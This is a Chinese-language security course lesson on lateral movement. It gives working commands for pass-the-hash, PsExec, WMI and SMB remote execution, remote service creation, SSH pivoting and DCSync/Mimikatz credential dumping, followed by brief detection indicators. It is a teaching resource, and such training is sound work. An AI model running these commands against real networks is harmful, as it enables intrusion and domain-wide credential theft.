横向移动技术
使用 WMI、PsExec、WinRM 和 SMB 共享在网络中移动,同时不触发警报。
横向移动技术 是 CoddyKit 上的免费 Cyber Security Academy 课时。 这是第 3 节课,共 4 节。 你可以在下方免费阅读本课时的完整内容 — 然后在浏览器中使用内置代码编辑器和全天候 AI 导师进行实践。 这是 Cyber Security Academy 学习路径的一部分,你的进度在网页和 CoddyKit 应用中同步。 Cyber Security Academy 课程共包含 4 节课。
什么是横向移动?
横向移动是攻击者在首次攻陷后逐步穿透网络所使用的一组技术——从第一个立足点跳转到域控制器、数据库和备份系统等更有价值的目标。
传递哈希(PtH)
Windows NTLM 身份验证允许直接使用密码哈希,而不是明文密码。攻击者转储 NTLM 哈希后,无需破解哈希即可向其他系统进行身份验证。
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH传递票据(PtT)
可以从内存中提取 Kerberos 票据(TGT 或 TGS),并导入这些票据,以票据持有者的身份进行身份验证。黄金票据攻击使用 KRBTGT 哈希伪造 TGT,从而获得对域的无限 Kerberos 访问权限。
远程代码执行:PSExec
psexec(Sysinternals 和 Impacket)通过 SMB/管理员共享在远程 Windows 主机上执行命令。需要管理员凭据。会在目标上创建服务二进制程序。
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecWMI 横向移动
Windows Management Instrumentation 支持远程代码执行,且无需创建许多工具能够检测到的文件:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB 与管理员共享
Windows 管理员共享(C$、ADMIN$、IPC$)允许攻击者使用管理员凭据进行横向移动:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5远程服务:sc 与 at
在远程系统上创建服务或计划任务:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP 与交互式会话
RDP(远程桌面协议,端口 3389)提供完整的交互式访问。攻击者使用窃取的凭据进行 RDP 连接。防御措施:将 RDP 限制到跳板服务器,要求使用 NLA,并记录所有会话。
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH 作为横向移动手段
在 Linux 环境中,攻击者使用窃取的密钥或凭据通过 SSH 进行横向移动。滥用代理转发可以通过已攻陷的主机进行跳转。SSH 隧道可以转发端口,以访问原本无法访问的系统。
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostActive Directory 复制(DCSync)
DCSync 滥用 AD 复制功能,直接从 DC 获取密码哈希,而无需在 DC 上运行代码——需要 DS-Replication-Get-Changes-All 权限:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt检测横向移动
检测指标:
- 事件 4624 中出现异常的类型 3(网络)登录
- 远程主机上的服务创建(事件 7045)
- 工作站之间的 SMB 连接
- 远程主机上的 WMI 进程创建
- 异常的账户行为(用户从多台计算机登录)
快速检查:横向移动
哪种技术允许攻击者使用捕获的 NTLM 哈希向 Windows 系统进行身份验证,而无需破解哈希?
课程回顾
横向移动利用已攻陷的凭据和协议在网络中扩散。关键技术包括:传递哈希(重复使用 NTLM 哈希)、传递票据(Kerberos)、使用 PSExec/WMI/SMB 进行远程执行,以及使用 DCSync 获取域凭据。检测重点包括:异常的网络登录(事件 4624)、远程服务创建(事件 7045)以及工作站到工作站的 SMB 流量。
用 AI 导师学习 Cyber Security Academy — 免费
在浏览器中编写并运行真实代码,获得全天候 AI 导师的即时帮助,并在网页或应用中继续学习。
- 课程
- 76
- 课程
- 303
常见问题解答
「横向移动技术」课时是免费的吗?
是的 — 「横向移动技术」的完整文本可在网页上免费阅读。要进行交互式练习(内置代码编辑器和全天候 AI 导师)并解锁 Cyber Security Academy 课程的其余内容,请升级到 CoddyKit PRO。 Cyber Security Academy 课程共包含 4 节课。
「横向移动技术」这节课中我会学到什么?
使用 WMI、PsExec、WinRM 和 SMB 共享在网络中移动,同时不触发警报。 你通过在浏览器中直接运行的动手代码来练习 Cyber Security Academy,全天候 AI 导师会在你学习这节课的过程中回答你的问题。
学习 Cyber Security Academy 需要有经验吗?
无需任何先前经验。CoddyKit 上的 Cyber Security Academy 课程适合初学者到高级学习者,你可以从这里开始或从头开始,按照自己的节奏学习。 这是第 3 节课,共 4 节。
「横向移动技术」课时需要多长时间?
大多数 CoddyKit 课程大约需要 5–10 分钟。每节课都很精短且互动,所以你能稳步进步,并在网页和应用中从离开的地方继续。
我能在这节 Cyber Security Academy 课中编写并运行代码吗?
能。每节 Cyber Security Academy 课都包含内置代码编辑器,你可以在浏览器中直接编写并运行真实代码,并获得即时 AI 反馈 — 无需本地设置。